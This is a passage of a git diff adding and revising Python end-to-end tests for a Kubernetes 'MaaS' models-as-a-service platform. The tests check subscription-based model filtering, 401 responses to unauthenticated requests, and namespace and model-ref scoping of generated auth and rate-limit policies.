+        try:
+            # Create SA
+            sa_token = _create_sa_token(sa_name, namespace=sa_ns)
+            sa_user = _sa_to_user(sa_name, namespace=sa_ns)
+
+            # Create two subscriptions with different models
+            log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}")
+            _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user])
+            _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user])
+
+            log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}")
+            _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+            _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user])
+
+            _wait_reconcile()
+
+            # Query with K8s token and header specifying sub1
+            log.info(f"Querying /v1/models with K8s token and header: {sub1_name}")
+            r1 = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {sa_token}",
+                    "x-maas-subscription": sub1_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r1.status_code == 200, f"Expected 200, got {r1.status_code}: {r1.text}"
+            models1 = r1.json().get("data") or []
+            model_ids1 = {m["id"] for m in models1}
+
+            # Should see only models from sub1
+            assert DISTINCT_MODEL_ID in model_ids1, f"Should see {DISTINCT_MODEL_ID} from {sub1_name}"
+            assert DISTINCT_MODEL_2_ID not in model_ids1, f"Should NOT see {DISTINCT_MODEL_2_ID} from {sub2_name}"
+
+            # Query with K8s token and header specifying sub2
+            log.info(f"Querying /v1/models with K8s token and header: {sub2_name}")
+            r2 = requests.get(
+                f"{_maas_api_url()}/v1/models",
+                headers={
+                    "Authorization": f"Bearer {sa_token}",
+                    "x-maas-subscription": sub2_name,
+                },
+                timeout=TIMEOUT,
+                verify=TLS_VERIFY,
+            )
+
+            assert r2.status_code == 200, f"Expected 200, got {r2.status_code}: {r2.text}"
+            models2 = r2.json().get("data") or []
+            model_ids2 = {m["id"] for m in models2}
+
+            # Should see only models from sub2
+            assert DISTINCT_MODEL_2_ID in model_ids2, f"Should see {DISTINCT_MODEL_2_ID} from {sub2_name}"
+            assert DISTINCT_MODEL_ID not in model_ids2, f"Should NOT see {DISTINCT_MODEL_ID} from {sub1_name}"
+
+            log.info(f"✅ K8s token with header filtering → Sub1: {len(models1)} models, Sub2: {len(models2)} models")
+
+        finally:
+            _delete_cr("maassubscription", sub1_name, namespace=maas_ns)
+            _delete_cr("maassubscription", sub2_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns)
+            _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns)
+            _delete_sa(sa_name, namespace=sa_ns)
+            _wait_reconcile()
+
+    def test_unauthenticated_request_401(self):
+        """
+        Test: Request to /v1/models without Authorization header gets 401.
+
+        Expected: HTTP 401 (authentication_error).
+        """
+        # Test: GET /v1/models WITHOUT Authorization header
+        # Expected: 401 Unauthorized
+        log.info("Testing: GET /v1/models without Authorization header")
+        url = f"{_maas_api_url()}/v1/models"
+        r = requests.get(
+            url,
+            timeout=TIMEOUT,
+            verify=TLS_VERIFY,
+        )
+
+        assert r.status_code == 401, f"Expected 401 for unauthenticated request, got {r.status_code}: {r.text}"
+
+        # Validate error response structure (if present)
+        try:
+            data = r.json()
+            if "error" in data:
+                error = data["error"]
+                # If error type is present, it should be authentication_error
+                if "type" in error:
+                    assert error["type"] == "authentication_error", \
+                        f"Expected error type 'authentication_error', got {error.get('type')}"
+        except (json.JSONDecodeError, ValueError):
+            # Response might not be JSON, which is acceptable for 401
+            pass
+
+        log.info(f"✅ Unauthenticated request → {r.status_code}")
diff --git a/test/e2e/tests/test_namespace_scoping.py b/test/e2e/tests/test_namespace_scoping.py
index 621304e3a..465d920ff 100644
--- a/test/e2e/tests/test_namespace_scoping.py
+++ b/test/e2e/tests/test_namespace_scoping.py
@@ -1,12 +1,9 @@
 """
-E2E tests for namespace scoping in MaaS Controller.
+E2E tests for namespace scoping in MaaS.
 
-Tests that MaaSAuthPolicy and MaaSSubscription can reference MaaSModelRef resources
-in different namespaces, and that the generated AuthPolicies and TokenRateLimitPolicies
-are created in the correct (model's) namespace.
-
-Uses real LLMInferenceService models and makes actual inference requests to verify
-the entire flow works end-to-end.
+Tests that (1) MaaS API and controller only watch the subscription namespace for MaaSAuthPolicy and
+MaaSSubscription, and (2) when those CRs reference a model by (name, namespace), only that exact
+model receives the generated AuthPolicy or TokenRateLimitPolicy.
 
 Requires:
   - GATEWAY_HOST env var (e.g. maas.apps.cluster.example.com)
@@ -18,9 +15,9 @@
 Environment variables (all optional, with defaults):
   - GATEWAY_HOST: Gateway hostname (required)
   - MAAS_API_BASE_URL: MaaS API URL (required)
-  - MAAS_NAMESPACE: Default MaaS namespace (default: opendatahub)
+  - MAAS_SUBSCRIPTION_NAMESPACE: MaaS subscription namespace (default: models-as-a-service)
   - E2E_TIMEOUT: Request timeout in seconds (default: 30)
-  - E2E_RECONCILE_WAIT: Wait time for controller reconciliation (default: 10)
+  - E2E_RECONCILE_WAIT: Wait time for controller reconciliation (default: 8)
   - E2E_SKIP_TLS_VERIFY: Set to "true" to skip TLS verification
   - E2E_MODEL_REF: Model ref for tests (default: facebook-opt-125m-simulated)
   - E2E_MODEL_NAMESPACE: Namespace where model MaaSModelRef lives (default: llm)
@@ -41,25 +38,15 @@
 
 # Constants
 TIMEOUT = int(os.environ.get("E2E_TIMEOUT", "30"))
-RECONCILE_WAIT = int(os.environ.get("E2E_RECONCILE_WAIT", "10"))
+RECONCILE_WAIT = int(os.environ.get("E2E_RECONCILE_WAIT", "8"))
 TLS_VERIFY = os.environ.get("E2E_SKIP_TLS_VERIFY", "").lower() != "true"
 MODEL_REF = os.environ.get("E2E_MODEL_REF", "facebook-opt-125m-simulated")
-MODEL_NAME = os.environ.get("E2E_MODEL_NAME", "facebook/opt-125m")
 MODEL_NAMESPACE = os.environ.get("E2E_MODEL_NAMESPACE", "llm")
 
 
 def _ns():
-    """Default MaaS namespace."""
-    return os.environ.get("MAAS_NAMESPACE", "opendatahub")
-
-
-def _gateway_url():
-    """Gateway URL for inference requests."""
-    host = os.environ.get("GATEWAY_HOST", "")
-    if not host:
-        raise RuntimeError("GATEWAY_HOST env var is required")
-    scheme = "http" if os.environ.get("INSECURE_HTTP", "").lower() == "true" else "https"
-    return f"{scheme}://{host}"
+    """Default MaaS subscription namespace."""
+    return os.environ.get("MAAS_SUBSCRIPTION_NAMESPACE", "models-as-a-service")
 
 
 def _maas_api_url():
@@ -126,6 +113,20 @@ def _delete_cr(kind: str, name: str, namespace: str):
     )
 
 
+def _create_external_model(name: str, namespace: str, provider: str = "test", endpoint: str = "test.example.com"):
+    """Create an ExternalModel CR with the given name and namespace."""
+    _apply_cr({
+        "apiVersion": "maas.opendatahub.io/v1alpha1",
+        "kind": "ExternalModel",
+        "metadata": {"name": name, "namespace": namespace},
+        "spec": {
+            "provider": provider,
+            "endpoint": endpoint,
+            "credentialRef": {"name": f"{name}-credentials"},
+        },
+    })
+
+
 def _get_cr(kind: str, name: str, namespace: str) -> Optional[dict]:
     """Get CR as dict, or None if not found."""
     result = subprocess.run(
@@ -138,30 +139,6 @@ def _get_cr(kind: str, name: str, namespace: str) -> Optional[dict]:
     return json.loads(result.stdout)
 
 
-def _wait_for_cr(kind: str, name: str, namespace: str, timeout: int = 30) -> bool:
-    """Wait for CR to exist."""
-    deadline = time.time() + timeout
-    while time.time() < deadline:
-        if _get_cr(kind, name, namespace):
-            return True
-        time.sleep(2)
-    return False
-
-
-def _wait_for_authpolicy_enforced(name: str, namespace: str, timeout: int = 60) -> bool:
-    """Wait for AuthPolicy to be enforced."""
-    deadline = time.time() + timeout
-    while time.time() < deadline:
-        cr = _get_cr("AuthPolicy", name, namespace)
-        if cr:
-            conditions = cr.get("status", {}).get("conditions", [])
-            for condition in conditions:
-                if condition.get("type") == "Enforced" and condition.get("status") == "True":
-                    return True
-        time.sleep(3)
-    return False
-
-
 def _create_namespace(name: str):
     """Create namespace if it doesn't exist."""
     result = subprocess.run(
@@ -182,73 +159,39 @@ def _delete_namespace(name: str):
     )
 
 
-def _list_models(api_key: str, model_ref: str, model_namespace: str = None, subscription: str = "simulator-subscription") -> requests.Response:
-    """List available models."""
-    url = f"{_gateway_url()}/llm/{model_ref}/v1/models"
+def _call_subscriptions_select(api_key: str, username: str, groups: list, requested_subscription: str = "") -> requests.Response:
+    """Call MaaS API POST /v1/subscriptions/select. Returns the response (always 200 with body)."""
+    url = f"{_maas_api_url()}/internal/v1/subscriptions/select"
     headers = {"Authorization": f"Bearer {api_key}"}
-    if subscription:
-        headers["x-maas-subscription"] = subscription
-    return requests.get(
-        url,
-        headers=headers,
-        timeout=TIMEOUT,
-        verify=TLS_VERIFY,
-    )
-
-
-def _inference(api_key: str, model_ref: str, model_namespace: str, subscription: str = "simulator-subscription") -> requests.Response:
-    """Make an inference request to a model."""
-    url = f"{_gateway_url()}/llm/{model_ref}/v1/completions"
-    headers = {
-        "Authorization": f"Bearer {api_key}",
-        "Content-Type": "application/json",
-    }
-    if subscription:
-        headers["x-maas-subscription"] = subscription
+    payload = {"username": username, "groups": groups}
+    if requested_subscription:
+        payload["requestedSubscription"] = requested_subscription
     return requests.post(
         url,
         headers=headers,
-        json={"model": MODEL_NAME, "prompt": "Hello", "max_tokens": 3},
+        json=payload,
         timeout=TIMEOUT,
         verify=TLS_VERIFY,
     )
 
 
-def _poll_status(api_key: str, model_ref: str, model_namespace: str, expected: int, timeout: int = 60, interval: int = 2, subscription: str = "simulator-subscription") -> requests.Response:
-    """Poll inference endpoint until expected status or timeout."""
-    deadline = time.time() + timeout
-    last_response = None
-    last_error = None
-    while time.time() < deadline:
-        try:
-            r = _inference(api_key, model_ref, model_namespace, subscription=subscription)
-            last_response = r
-            if r.status_code == expected:
-                return r
-            log.warning(f"Got status {r.status_code}, expected {expected}. Response: {r.text[:200]}")
-        except Exception as e:
-            log.warning(f"Request failed: {type(e).__name__}: {e}")
-            last_error = e
-        time.sleep(interval)
-
-    if last_response:
-        status = f"{last_response.status_code}: {last_response.text[:200]}"
-    elif last_error:
-        status = f"Exception: {type(last_error).__name__}: {last_error}"
-    else:
-        status = "No response"
-    raise AssertionError(f"Expected status {expected} within {timeout}s, got {status}")
+def _wait_reconcile(seconds=None):
+    """Wait for controller reconciliation."""
+    time.sleep(seconds or RECONCILE_WAIT)
 
 
-@pytest.fixture(scope="module")
-def policy_namespace():
-    """Create a test namespace for policies."""
-    ns = f"e2e-ns-policy-{uuid.uuid4().hex[:6]}"
-    log.info(f"Creating policy namespace: {ns}")
-    _create_namespace(ns)
-    yield ns
-    log.info(f"Cleaning up policy namespace: {ns}")
-    _delete_namespace(ns)
+def _get_cr_annotation(kind: str, name: str, namespace: str, key: str):
+    """Return the annotation value for key on the CR, or \"\" if not found."""
+    result = subprocess.run(
+        ["oc", "get", kind, name, "-n", namespace, "-o", "json"],
+        capture_output=True,
+        text=True,
+    )
+    if result.returncode != 0:
+        return ""
+    obj = json.loads(result.stdout)
+    annotations = obj.get("metadata", {}).get("annotations") or {}
+    return annotations.get(key, "") or ""
 
 
 @pytest.fixture(scope="module")
@@ -258,447 +201,316 @@ def api_key():
     return key
 
 
-class TestCrossNamespaceAuthPolicy:
-    """Test MaaSAuthPolicy can reference models in different namespaces."""
+class TestMaaSAPIWatchNamespace:
+    """Test that MaaS API only gets MaaSSubscription from the subscription namespace (MAAS_SUBSCRIPTION_NAMESPACE)."""
 
-    def test_auth_policy_in_different_namespace(self, policy_namespace, api_key):
+    def test_subscription_in_subscription_namespace_visible_to_api(self, api_key):
         """
-        Create MaaSAuthPolicy in policy-namespace that references model in llm namespace.
-        Verify that AuthPolicy is created in llm namespace (model's namespace).
-        Verify that inference requests work.
+        MaaSSubscription in the subscription namespace should be visible to the API.
+        POST /v1/subscriptions/select with that subscription name should succeed.
         """
-        policy_name = f"cross-ns-auth-{uuid.uuid4().hex[:6]}"
-
-        log.info(f"Creating cross-namespace MaaSAuthPolicy {policy_name}")
-        log.info(f"  Policy namespace: {policy_namespace}")
-        log.info(f"  Model namespace: {MODEL_NAMESPACE}")
-
-        # Create MaaSAuthPolicy in policy namespace referencing model in MODEL_NAMESPACE
-        _apply_cr({
-            "apiVersion": "maas.opendatahub.io/v1alpha1",
-            "kind": "MaaSAuthPolicy",
-            "metadata": {"name": policy_name, "namespace": policy_namespace},
-            "spec": {
-                "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
-                "subjects": {"groups": [{"name": "system:authenticated"}]},
-            },
-        })
-
+        sub_name = f"e2e-api-visible-{uuid.uuid4().hex[:6]}"
+        ns = _ns()
         try:
-            # Wait for controller to reconcile
-            time.sleep(RECONCILE_WAIT)
-
-            # Verify MaaSAuthPolicy exists
-            maas_policy = _get_cr("MaaSAuthPolicy", policy_name, policy_namespace)
-            assert maas_policy is not None, f"MaaSAuthPolicy {policy_name} not found"
-
-            # Verify generated AuthPolicy is created in MODEL namespace (not policy namespace)
-            auth_policy_name = f"maas-auth-{MODEL_REF}"
-            auth_policy = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE)
-            assert auth_policy is not None, \
-                f"AuthPolicy {auth_policy_name} not found in model namespace {MODEL_NAMESPACE}"
-
-            # Wait for AuthPolicy to be enforced
-            log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...")
-            enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60)
-            assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout"
-
-            # Verify AuthPolicy is NOT in policy namespace
-            auth_in_policy_ns = _get_cr("AuthPolicy", auth_policy_name, policy_namespace)
-            assert auth_in_policy_ns is None, \
-                f"AuthPolicy should not exist in policy namespace {policy_namespace}"
-
-            # Test model listing endpoint
-            log.info("Testing /v1/models endpoint with cross-namespace AuthPolicy")
-            r = _list_models(api_key, MODEL_REF, MODEL_NAMESPACE)
-            assert r.status_code == 200, f"Model listing failed: {r.status_code}"
-            models_data = r.json()
-            model_ids = [m.get("id") for m in models_data.get("data", [])]
-            assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}"
-            log.info(f"✓ Model {MODEL_NAME} found in /v1/models response")
-
-            # Make inference request to verify everything works
-            log.info("Testing inference request with cross-namespace AuthPolicy")
-            r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=90)
-            assert r.status_code == 200, f"Expected 200, got {r.status_code}"
-
-            log.info("✓ Cross-namespace AuthPolicy test passed")
-
+            _apply_cr({
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSSubscription",
+                "metadata": {"name": sub_name, "namespace": ns},
+                "spec": {
+                    "owner": {"groups": [{"name": "system:authenticated"}]},
+                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}],
+                },
+            })
+            _wait_reconcile()
+
+            r = _call_subscriptions_select(api_key, "e2e-api-user", ["system:authenticated"], requested_subscription=sub_name)
+            assert r.status_code == 200, f"subscriptions/select failed: {r.status_code} {r.text}"
+            data = r.json()
+            assert data.get("error") != "not_found", (
+                f"Subscription {sub_name} in subscription namespace should be visible to API, got: {data}"
+            )
+            assert data.get("name") == sub_name, (
+                f"Expected name={sub_name}, got: {data}"
+            )
+            log.info(f"✓ Subscription {sub_name} in {ns} is visible to MaaS API")
         finally:
-            _delete_cr("MaaSAuthPolicy", policy_name, policy_namespace)
-            # Note: We don't delete the AuthPolicy because other tests may rely on it
+            _delete_cr("MaaSSubscription", sub_name, ns)
+            _wait_reconcile()
 
-    def test_multiple_policies_different_namespaces_same_model(self, policy_namespace, api_key):
+    def test_subscription_in_another_namespace_not_visible_to_api(self, api_key):
         """
-        Create multiple MaaSAuthPolicies in different namespaces referencing the same model.
-        Verify that they aggregate correctly into a single AuthPolicy.
-        Test the deletion bug fix: deleting one policy should NOT delete the AuthPolicy.
+        MaaSSubscription in a namespace other than the subscription namespace should NOT be visible to the API.
+        POST /v1/subscriptions/select with that subscription name should return not_found.
         """
-        policy1_name = f"multi-ns-policy1-{uuid.uuid4().hex[:6]}"
-        policy2_name = f"multi-ns-policy2-{uuid.uuid4().hex[:6]}"
-        test_group = f"test-group-{uuid.uuid4().hex[:4]}"
+        sub_name = f"e2e-api-hidden-{uuid.uuid4().hex[:6]}"
+        other_ns = "e2e-api-unwatched-ns"
+        _create_namespace(other_ns)
+        try:
+            _apply_cr({
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSSubscription",
+                "metadata": {"name": sub_name, "namespace": other_ns},
+                "spec": {
+                    "owner": {"groups": [{"name": "system:authenticated"}]},
+                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}],
+                },
+            })
+            _wait_reconcile()
+
+            r = _call_subscriptions_select(api_key, "e2e-api-user", ["system:authenticated"], requested_subscription=sub_name)
+            assert r.status_code == 200, f"subscriptions/select failed: {r.status_code} {r.text}"
+            data = r.json()
+            assert data.get("error") == "not_found", (
+                f"Subscription {sub_name} in {other_ns} should NOT be visible to API (expected not_found), got: {data}"
+            )
+            log.info(f"✓ Subscription {sub_name} in {other_ns} is correctly not visible to MaaS API")
+        finally:
+            _delete_cr("MaaSSubscription", sub_name, other_ns)
+            _delete_namespace(other_ns)
+            _wait_reconcile()
 
-        # Create second policy namespace
-        policy_namespace2 = f"e2e-ns-policy2-{uuid.uuid4().hex[:6]}"
-        _create_namespace(policy_namespace2)
 
-        try:
-            log.info(f"Creating two MaaSAuthPolicies in different namespaces for same model")
+class TestMaaSControllerWatchNamespace:
+    """Verifies MaaS controller only reconciles MaaSAuthPolicy and MaaSSubscription in the subscription namespace."""
 
-            # Create first policy in policy_namespace
+    def test_authpolicy_and_subscription_in_maas_subscription_namespace(self):
+        """MaaSAuthPolicy and MaaSSubscription in MaaS subscription namespace should be reconciled
+        and should appear in the AuthPolicy and TRLP annotations for the model."""
+        ns = _ns()
+        try:
             _apply_cr({
                 "apiVersion": "maas.opendatahub.io/v1alpha1",
                 "kind": "MaaSAuthPolicy",
-                "metadata": {"name": policy1_name, "namespace": policy_namespace},
+                "metadata": {"name": "e2e-watched-auth", "namespace": ns},
                 "spec": {
                     "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
                     "subjects": {"groups": [{"name": "system:authenticated"}]},
                 },
             })
+            _apply_cr({
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSSubscription",
+                "metadata": {"name": "e2e-watched-sub", "namespace": ns},
+                "spec": {
+                    "owner": {"groups": [{"name": "system:authenticated"}]},
+                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}],
+                },
+            })
+            _wait_reconcile(15)
+
+            auth_name = f"maas-auth-{MODEL_REF}"
+            auth_policies = [x.strip() for x in (_get_cr_annotation("authpolicy", auth_name, MODEL_NAMESPACE, "maas.opendatahub.io/auth-policies") or "").split(",") if x.strip()]
+            assert "e2e-watched-auth" in auth_policies, (
+                f"AuthPolicy {auth_name} not found or MaaSAuthPolicy e2e-watched-auth not reconciled"
+            )
 
-            # Create second policy in policy_namespace2
+            trlp_name = f"maas-trlp-{MODEL_REF}"
+            subscriptions = [x.strip() for x in (_get_cr_annotation("tokenratelimitpolicy", trlp_name, MODEL_NAMESPACE, "maas.opendatahub.io/subscriptions") or "").split(",") if x.strip()]
+            assert "e2e-watched-sub" in subscriptions, (
+                f"TRLP {trlp_name} not found or MaaSSubscription e2e-watched-sub not reconciled"
+            )
+        finally:
+            _delete_cr("MaaSAuthPolicy", "e2e-watched-auth", ns)
+            _delete_cr("MaaSSubscription", "e2e-watched-sub", ns)
+            _wait_reconcile()
+
+    def test_authpolicy_and_subscription_in_another_namespace(self):
+        """MaaSAuthPolicy and MaaSSubscription in another namespace should not be reconciled
+        and should not appear in the AuthPolicy and TRLP annotations for the model."""
+        ns = "e2e-unwatched-ns"
+        _create_namespace(ns)
+        try:
             _apply_cr({
                 "apiVersion": "maas.opendatahub.io/v1alpha1",
                 "kind": "MaaSAuthPolicy",
-                "metadata": {"name": policy2_name, "namespace": policy_namespace2},
+                "metadata": {"name": "e2e-unwatched-auth", "namespace": ns},
                 "spec": {
                     "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
-                    "subjects": {"groups": [{"name": test_group}]},
+                    "subjects": {"groups": [{"name": "system:authenticated"}]},
+                },
+            })
+            _apply_cr({
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSSubscription",
+                "metadata": {"name": "e2e-unwatched-sub", "namespace": ns},
+                "spec": {
+                    "owner": {"groups": [{"name": "system:authenticated"}]},
+                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}],
                 },
             })
+            _wait_reconcile(15)
 
-            # Wait for reconciliation
-            time.sleep(RECONCILE_WAIT)
-
-            # Verify AuthPolicy exists in model namespace
-            auth_policy_name = f"maas-auth-{MODEL_REF}"
-            auth_policy = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE)
-            assert auth_policy is not None, "Aggregated AuthPolicy should exist"
-
-            # Wait for AuthPolicy to be enforced
-            log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...")
-            enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60)
-            assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout"
-
-            # Verify both policies' subjects are in the AuthPolicy
-            spec = auth_policy.get("spec", {})
-            log.info(f"AuthPolicy spec: {json.dumps(spec, indent=2)[:500]}")
-
-            # Test model listing endpoint
-            r = _list_models(api_key, MODEL_REF, MODEL_NAMESPACE)
-            assert r.status_code == 200, f"Model listing failed: {r.status_code}"
-            models_data = r.json()
-            model_ids = [m.get("id") for m in models_data.get("data", [])]
-            assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}"
-
-            # Make inference request to verify it works
-            r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=90)
-            assert r.status_code == 200, f"Expected 200, got {r.status_code}"
-
-            # Now delete the FIRST policy (not the last one)
-            log.info(f"Deleting first policy {policy1_name} (should NOT delete AuthPolicy)")
-            _delete_cr("MaaSAuthPolicy", policy1_name, policy_namespace)
-            time.sleep(RECONCILE_WAIT)
-
-            # Verify AuthPolicy still exists (bug fix: it should NOT be deleted)
-            auth_policy_after = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE)
-            assert auth_policy_after is not None, \
-                "AuthPolicy should still exist after deleting first policy (other policies reference it)"
-
-            # Inference should still work
-            r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=60)
-            assert r.status_code == 200, "Inference should still work after deleting first policy"
-
-            # Now delete the LAST test policy
-            log.info(f"Deleting last test policy {policy2_name}")
-            _delete_cr("MaaSAuthPolicy", policy2_name, policy_namespace2)
-            time.sleep(RECONCILE_WAIT)
-
-            # Verify AuthPolicy still exists if there are other MaaSAuthPolicies for this model
-            # (like the pre-existing simulator-access policy)
-            auth_policy_final = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE)
-            # Note: AuthPolicy may still exist due to pre-existing policies (e.g. simulator-access)
-            # The key test was that deleting the FIRST policy didn't delete the AuthPolicy
-            log.info(f"AuthPolicy exists after deleting test policies: {auth_policy_final is not None}")
-
-            log.info("✓ Multiple policies deletion test passed (bug fix verified)")
+            auth_name = f"maas-auth-{MODEL_REF}"
+            auth_policies = [x.strip() for x in (_get_cr_annotation("authpolicy", auth_name, MODEL_NAMESPACE, "maas.opendatahub.io/auth-policies") or "").split(",") if x.strip()]
+            assert "e2e-unwatched-auth" not in auth_policies, (
+                "MaaSAuthPolicy e2e-unwatched-auth reconciled"
+            )
 
+            trlp_name = f"maas-trlp-{MODEL_REF}"
+            subscriptions = [x.strip() for x in (_get_cr_annotation("tokenratelimitpolicy", trlp_name, MODEL_NAMESPACE, "maas.opendatahub.io/subscriptions") or "").split(",") if x.strip()]
+            assert "e2e-unwatched-sub" not in subscriptions, (
+                "MaaSSubscription e2e-unwatched-sub reconciled"
+            )
         finally:
-            _delete_cr("MaaSAuthPolicy", policy1_name, policy_namespace)
-            _delete_cr("MaaSAuthPolicy", policy2_name, policy_namespace2)
-            _delete_namespace(policy_namespace2)
+            _delete_cr("MaaSAuthPolicy", "e2e-unwatched-auth", ns)
+            _delete_cr("MaaSSubscription", "e2e-unwatched-sub", ns)
+            _wait_reconcile()
+            _delete_namespace(ns)
 
 
-class TestCrossNamespaceSubscription:
-    """Test MaaSSubscription can reference models in different namespaces."""
+class TestModelRef:
+    """Test model ref scoping: MaaSAuthPolicy and MaaSSubscription only reconcile into the referenced model's namespace."""
 
-    def test_subscription_in_different_namespace(self, policy_namespace, api_key):
+    def test_auth_policy_model_ref(self):
         """
-        Create MaaSSubscription in policy-namespace that references model in llm namespace.
-        Verify that TokenRateLimitPolicy is created in llm namespace (model's namespace).
-        Verify that inference requests work with rate limiting.
+        Create a new namespace and two MaaSModelRefs: MODEL_REF in the new namespace, and another
+        name in MODEL_NAMESPACE. Create MaaSAuthPolicy referencing MODEL_REF in MODEL_NAMESPACE.
+        Verify it is reconciled into MODEL_REF's AuthPolicy in MODEL_NAMESPACE, and the other two
+        models' AuthPolicies do not exist.
         """
-        subscription_name = f"cross-ns-sub-{uuid.uuid4().hex[:6]}"
-        maas_auth_policy_name = f"cross-ns-auth-for-sub-{uuid.uuid4().hex[:6]}"
-
-        log.info(f"Creating cross-namespace MaaSSubscription {subscription_name}")
-        log.info(f"  Subscription namespace: {policy_namespace}")
-        log.info(f"  Model namespace: {MODEL_NAMESPACE}")
-
-        # First ensure there's an AuthPolicy for the model (subscription needs auth to work)
-        _apply_cr({
-            "apiVersion": "maas.opendatahub.io/v1alpha1",
-            "kind": "MaaSAuthPolicy",
-            "metadata": {"name": maas_auth_policy_name, "namespace": policy_namespace},
-            "spec": {
-                "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
-                "subjects": {"groups": [{"name": "system:authenticated"}]},
-            },
-        })
-
-        # Create MaaSSubscription in policy namespace referencing model in MODEL_NAMESPACE
-        _apply_cr({
-            "apiVersion": "maas.opendatahub.io/v1alpha1",
-            "kind": "MaaSSubscription",
-            "metadata": {"name": subscription_name, "namespace": policy_namespace},
-            "spec": {
-                "owner": {"groups": [{"name": "system:authenticated"}]},
-                "modelRefs": [
-                    {
-                        "name": MODEL_REF,
-                        "namespace": MODEL_NAMESPACE,
-                        "tokenRateLimits": [{"limit": 100, "window": "1m"}],
-                    }
-                ],
-            },
-        })
+        other_ns = f"e2e-modelref-{uuid.uuid4().hex[:6]}"
+        other_model_ref = f"e2e-other-model-{uuid.uuid4().hex[:6]}"
+        policy_name = f"e2e-auth-ref-{uuid.uuid4().hex[:6]}"
+        ns = _ns()
 
+        _create_namespace(other_ns)
         try:
-            # Wait for controller to reconcile
-            time.sleep(RECONCILE_WAIT)
+            # Create ExternalModel CRs in both namespaces
+            _create_external_model("test-backend", other_ns)
+            _create_external_model("test-backend", MODEL_NAMESPACE)
 
-            # Verify MaaSSubscription exists
-            maas_sub = _get_cr("MaaSSubscription", subscription_name, policy_namespace)
-            assert maas_sub is not None, f"MaaSSubscription {subscription_name} not found"
-
-            # Wait for AuthPolicy to be enforced (subscription needs auth to work)
-            auth_policy_name = f"maas-auth-{MODEL_REF}"
-            log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...")
-            enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60)
-            assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout"
+            # MaaSModelRef in the new namespace with same name as MODEL_REF
+            _apply_cr({
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSModelRef",
+                "metadata": {"name": MODEL_REF, "namespace": other_ns},
+                "spec": {"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}},
+            })
+            # MaaSModelRef in MODEL_NAMESPACE with a different name (not referenced by policy)
+            _apply_cr({
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSModelRef",
+                "metadata": {"name": other_model_ref, "namespace": MODEL_NAMESPACE},
+                "spec": {"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}},
+            })
 
-            # Verify generated TokenRateLimitPolicy is created in MODEL namespace
-            trlp_name = f"maas-trlp-{MODEL_REF}"
-            trlp = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE)
-            assert trlp is not None, \
-                f"TokenRateLimitPolicy {trlp_name} not found in model namespace {MODEL_NAMESPACE}"
-
-            # Verify TokenRateLimitPolicy is NOT in subscription namespace
-            trlp_in_sub_ns = _get_cr("TokenRateLimitPolicy", trlp_name, policy_namespace)
-            assert trlp_in_sub_ns is None, \
-                f"TokenRateLimitPolicy should not exist in subscription namespace {policy_namespace}"
-
-            # Test model listing endpoint
-            log.info(f"Testing /v1/models endpoint with cross-namespace Subscription {subscription_name}")
-            r = _list_models(api_key, MODEL_REF, MODEL_NAMESPACE, subscription=subscription_name)
-            assert r.status_code == 200, f"Model listing failed: {r.status_code}"
-            models_data = r.json()
-            model_ids = [m.get("id") for m in models_data.get("data", [])]
-            assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}"
